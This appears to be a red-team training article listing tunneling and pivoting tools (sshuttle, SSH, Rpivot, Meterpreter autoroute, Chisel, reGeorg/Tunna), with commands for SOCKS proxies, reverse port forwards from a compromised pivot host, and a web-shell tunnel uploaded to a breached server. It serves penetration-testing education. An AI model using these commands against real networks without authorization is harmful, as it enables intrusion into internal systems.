Tunneling and port forwarding tools used during red teaming assessments
Security experts traverse network boundaries to access internal infrastructures and sensitive information even over the most protected and secure environments. With tunneling and port-forwarding methods, a pivot machine inside the internal network can be used as a bounce machine to connect with other unrouted networks, critical devices, active directory assets, including the AD controller, and all the perimeter.
Most Popular Tools
Sshuttle
Sshuttle is a transparent proxy server over ssh that works as a simple VPN. It doesn’t require admin access ad forwards the traffic over SSH protocol. This tool also supports DNS tunneling when TCP communication is blocked by default.
What should you learn next?
To transfer traffic to 10.10.10.0/24 via the pivot, we can use the following command:
sshuttle -r ptavares@192.168.2.105 10.10.10.0/24
After that, sshuttle will create the iptables rules, and the communication can be done by using a command like this:
curl --head http://10.10.10.2
URL: https://github.com/sshuttle/sshuttle
SSH Tunneling
Suppose you find a way to communicate with the SSH server installed on the target server, connect with the -D flag. With this parameter in place, the tool will spawn a socks server on the client side.
ssh ptavares@192.168.2.105 -D 1080
On the other hand, specifying a single port to forward is also possible using -L fag.
ssh ptavares@192.168.2.105 -L 445:192.168.2.105:445
More details can be found here.
Rpivot
Rpivot is a SOCKS proxy based on a pivot tool that works like an SSH dynamic proxy (-D option). However, it works in reverse order.
Server - auditor’s machine
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
Client — target machine
python client.py --server-ip <ip> --server-port 9443
The server will create a SOCKS proxy over the port 1080 that will forward all the traffic through the client — the target machine.
This kind of approach can also be used in active directory networks with the following syntax:
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
URL: https://github.com/klsecservices/rpivot
Meterpreter - autoroute
Port forwarding and pivoting can also be done using the meterpreter framework and the powerful tool: proxychains.
To automatically route, use the following:
run autoroute -s 192.168.5.1/24
run autoroute -p
use auxiliary/server/socks4a
set SRVPORT 8080
run
proxychains curl http://192.168.5.40
More information about this scenario is here.
URL: https://github.com/rapid7/meterpreter
Chisel
Chisel is a tool that encapsulates a TCP session in an HTTP tunnel while securing it via SSH. In detail, the communication is full-encrypted via SSH, and it supports mutual authentication, automatic reconnection and has its private SOCKS 5 proxy server.
Local port forwarding via Chisel
Pivot machine:
$ chisel server -p 8080 --host 192.168.2.105 -v
Auditor’s machine:
$ chisel client -v http://192.168.2.105:8080 127.0.0.1:33333:10.42.42.2:80
$ curl --head http://127.0.0.1:33333
Reverse remote port forwarding
Auditor’s machine:
$ chisel server -p 8888 --host 192.168.2.149 --reverse -v
Pivot machine:
$ chisel client -v http://192.168.2.149:8888 R:127.0.0.1:44444:10.42.42.2:80
$ curl --head http://127.0.0.1:44444
A full scenario using Chisel can be found here.
URL: https://github.com/jpillora/chisel
Web-proxies / reGeorg and Tunna
ReGeorg and Tunna are very similar and work with a web shell to create a local SOCKS proxy. This is an excellent way in the most challenging scenarios, for instance, when all the TCP communication, bind services, and outgoing traffic is blocked.
The steps to create the scenario are the following:
- Upload the tunnel file (aspx|ashx|jsp|php) to the target webserver (by using how the server was compromised or accessed).
- Use: reGeorgSocksProxy.py
$ python reGeorgSocksProxy.py -p 8080 -u http://server:8080/tunnel.jsp
re-Georg: https://github.com/sensepost/reGeorg
Tunna: https://github.com/SECFORCE/Tunna
FREE role-guided training plans
A list of real scenario examples and the effectiveness of various port forwarding and tunneling methods can also be accessed in this article.
Sources:
- A Red Teamer's guide to pivoting, artkond
- SSH pivoting, ired.team
- Pivoting, GitBook - Segurança Informática